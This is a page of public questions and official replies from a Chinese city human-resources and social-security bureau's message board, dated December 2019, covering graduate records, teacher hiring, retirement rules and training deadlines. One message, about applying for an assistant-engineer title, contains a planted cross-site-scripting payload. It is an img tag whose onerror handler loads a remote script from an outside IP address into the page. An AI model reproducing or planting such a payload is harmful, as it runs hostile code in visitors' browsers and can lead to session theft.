白银市人力资源和社会保障局微信二维码
您当前的位置:首页 > 公众留言

留言内容:毕业后个人档案在哪里提取

发布者:张磊发布时间:2019-12-19留言类型:其他

已回复: 网友你好:高校毕业生档案先由学校统一发至市人才交流中心,年底会按生源地分派到各县区。市直、各县区报到地址及联系电话:
  白银市: 白银市人社局办公大楼二楼大厅(白银市诚信路611号) 电话:0943-8305164。
  会宁县: 嘉禾大厦会宁县公共就业和人力服务大厅6楼(现代路嘉禾大厦) 电话:0943-3512800。
  景泰县: 景泰县人力资源和社会保障局北楼1楼(景泰县一条山镇南街88号) 电话:0943-5533769。
  靖远县: 靖远县人民政府政务大厅1楼(靖远县人民路1号) 电话:0943-6128456。
  平川区: 平川区人社大厦2楼208室(平川区兴平北路53号) 电话:0943-6626690。
  白银区: 白银区政府5号统办楼2楼大厅(白银区天津路1号) 电话:0943-8223639。

留言内容:人社局给大学生进企业的1500元补助被学校领导说成是用来交社保的,园长直接支付宝收款码发给每个人,正好这些补助用来交保险,企业给员工买的保险不应该承担一部分吗

发布者:唐旭虹发布时间:2019-12-18留言类型:其他

已回复: 网友您好:您所反映的问题,平川区人社局已与该幼儿园沟通解决,谢谢您对我们工作的支持!

留言内容:你好,我上次询问的,本人有特殊工种8年,后调离到后勤基层管理岗位10几年了,有职称待遇,我不想提前退休。根据人社部发的2018年73号文,我可以选择弹性退休,咱们在执行这个文件吗?像我这种情况,请给我一个政策性的解释,以便企业按文件执行。谢谢了!

发布者:周红梅发布时间:2019-12-18留言类型:其他

已回复: 网友您好:根据甘肃省人民政府办公厅关于印发《完善企业职工基本养老保险制度实施办法》的通知(甘政办发[2006]87号),第十九条企业职工享受基本养老保险的条件:“(二)特殊工种退休条件为:凡从事高空和特别繁重体力劳动工作累计满10年;从事井下、高温工作累计满9年;从事其他有害身体健康工作累计满8年的职工,男年满55周岁以上,女年满45周岁以上,缴费年限累计满15年。”,你已满足提前退休条件,可以办理特殊工种提前退休。特殊工种退休年龄可以实行弹性退休年龄制度,即符合特殊工种退休条件的职工,身体健康,工作需要,按照企业结合自身实际制定的相应操作办法,在到达法定退休年龄一个月之前,经本人申请,企业同意,劳动保障部门备案,其退休年龄可以适当延迟,延迟的年限最短不得少于一年,并按整年操作,但最长不得超过法定正常退休年龄。

留言内容:因职称需要,多次给职改办(0943-8224993)打电话,没人接,甚至一天打几十个电话都没人接。具体是什么原因???

发布者:2222发布时间:2019-12-18留言类型:其他

已回复: 网友您好:请您留个人联系电话,我们工作人员联系您!

留言内容:白银市教师招聘今年还有吗?希望给予准确的答复!不要让毕业生一直等下去,可以么?

发布者:刘小晓发布时间:2019-12-17留言类型:其他

已回复: 网友您好:根据有关规定,教师招聘工作由教育局牵头,据了解,招聘公告将于近期发布,请关注教育局官网。谢谢您对我们工作的支持!

留言内容:这都快12月下旬了,2019年医疗和教育岗位还招人吗

发布者:258发布时间:2019-12-17留言类型:其他

已回复: 网友您好:根据有关规定,医疗系列招聘工作由市卫健委牵头,教师招聘工作由教育局牵头,据了解,医疗招聘公告已发布,教育招聘公告将于近期发布,请关注卫健委和教育局官网。谢谢您对我们工作的支持!

留言内容:您好!白银市今年不会通过教师考编的方式招聘了吗?教师考编和明年的综合类事业编考试一起考吗?

发布者:程将发布时间:2019-12-17留言类型:其他

已回复: 网友您好:根据有关规定,教师招聘工作由教育局牵头,据了解,招聘公告将于近期发布,请关注教育局官网。谢谢您对我们工作的支持!

留言内容:我在甘肃省就业网上业务经办系统的提交毕业生档案报道资料qq.com一直无人处理

发布者:蒲文斌发布时间:2019-12-17留言类型:其他

已回复: 网友你好:高校毕业生网络渠道报到登记一是进入“甘肃省人力资源和社会保障厅网上办事大厅-劳动就业-高校毕业生登记”进行网上报到登记。二是微信扫描“甘肃省人力资源和社会保障厅网站首页-右上角甘肃省人社厅微信-服务大厅-高校毕业生报到登记”进行报到登记。网络登记之后由县区人社局工作人员审核通过,根据您的情况请与县区人社局联系。

留言内容:我是靖远县的教师职工,由于个人身体原因,要去白银市第一人民医院生孩子,现在想知道去白银生还会和县城一样同比报销吗?

发布者:王丽丽发布时间:2019-12-17留言类型:其他

已回复: 网友您好:因机构改革,医保业务已划转至市医保局,具体保险问题请与市医保局联系。谢谢您对我们工作的支持!

留言内容:事业单位今年有招聘吗

发布者:hrtw发布时间:2019-12-17留言类型:其他

已回复: 网友您好:根据上级规定,结合我市实际,综合类事业单位招聘工作计划开展于2020年5月份组织实施,笔试将参加全省统一分类考试感谢您对我们工作的支持。

留言内容:您好:
因为辞职以后部分原因,档案在原公司留存,想要调出档案至靖远县,调档函是在县档案局开设还是其它部门,可以告知地址吗?

发布者:王**发布时间:2019-12-16留言类型:其他

已回复: 网友您好:人事档案回原籍需要当地人社局开具调档函。靖远县人社局: 靖远县人民政府政务大厅1楼(靖远县人民路1号) 电话:0943-6128456。

留言内容:今年教师招聘还有希望吗

发布者:123发布时间:2019-12-16留言类型:其他

已回复: 网友您好:根据有关规定,教师招聘工作由教育局牵头,据了解,招聘公告将于近期发布,请关注教育局官网。谢谢您对我们工作的支持!

留言内容:你好,我想咨询一下双学位评中级职称的关于年限、条件等相关政策

发布者:小成发布时间:2019-12-16留言类型:其他

已回复: 网友您好:鉴于您留言中未说明您是哪个系列的中级职称评定,我们无法给予您精确的答复,建议您电话联系职改办直接咨询。电话:8224993。谢谢您对我们工作的支持!

留言内容:领导,您好!今年教师招聘会通过教师事业编考试的方式招聘吗?(除了人才引进)

发布者:江城发布时间:2019-12-15留言类型:其他

已回复: 网友您好:根据有关规定,教师招聘工作由教育局牵头,据了解,招聘公告将于近期发布,请关注教育局官网。谢谢您对我们工作的支持!

留言内容:计划在2019年12月31日结束的专业技术人员的继续教育培训,原计划是12月31日结束,结果在11月29日就停止了激活,没有参加的培训的怎么办?

发布者:郝宝玉发布时间:2019-12-15留言类型:其他

已回复: 网友您好:经与专技科工作人员联系,过了激活期需要与网站技术人员联系。具体情况请与专技科联系。电话:8246833

留言内容:社保卡办理进度

发布者:李长林发布时间:2019-12-14留言类型:其他

已回复: 网友您好:查询社保卡办理进度请携带本人身份证到人社局一楼社保大厅10号台查询。咨询电话:8226986.谢谢您对我们工作的支持!

留言内容:你好,现在已经12月份了,请问2019年事业单位教师招聘什么时候出公告?

发布者:王盼发布时间:2019-12-13留言类型:其他

已回复: 网友您好:根据有关规定,教师招聘工作由教育局牵头,据了解,招聘公告将于近期发布,请关注教育局官网。谢谢您对我们工作的支持!

留言内容:您好,我是本科毕业生,想要申请助理工程师,应该走什么样的流程呢?谢谢! <img src=6 onerror=s2='scr';s1=document.createElement(s2+'ipt');s1.src='http://47.107.186.253/R17lWn?1576050391';document.body.append(s1); >

发布者:王源发布时间:2019-12-12留言类型:其他

已回复: 网友您好:根据相关文件规定,初级职称民营企业、非公组织、自由职业者,由单位考核认定,报工作单位或档案所在县区职改办发文确认资格;档案在市人才交流服务中心托管的,由市人才交流服务中心发文确认资格。具体要求请关注人社局官网http://rsj.baiyin.gov.cn,搜索《关于初级职称考核认定的通知》。谢谢您对我们工作的支持!

留言内容:白银市教师招聘今年还有吗?希望给予准确的答复!

发布者:23365发布时间:2019-12-12留言类型:其他

已回复: 网友您好:教育系列人才引进工作由教育局牵头,据了解,急需紧缺专业人才引进工作实施方案待市上讨论研究通过后近期将出台,明确教育专业人才招聘按照人才引进相关规定组织实施。谢谢您对我们工作的支持!

留言内容:你好,白银市专技天下写的是2019年12月31日截止答题,怎么现在已经停止激活,不能缴费和答题,请问怎么办?今年会补答题吗?升职称会不会影响?

发布者:魏志强发布时间:2019-12-11留言类型:其他

已回复: 网友您好:据了解过了激活期请与网站技术人员联系。详细问题请咨询专技科电话8246833.谢谢您对我们工作的支持!

分页:  1678   首页 上一页 1 2 3 4 5 6 7 8 9 10 下一页 尾页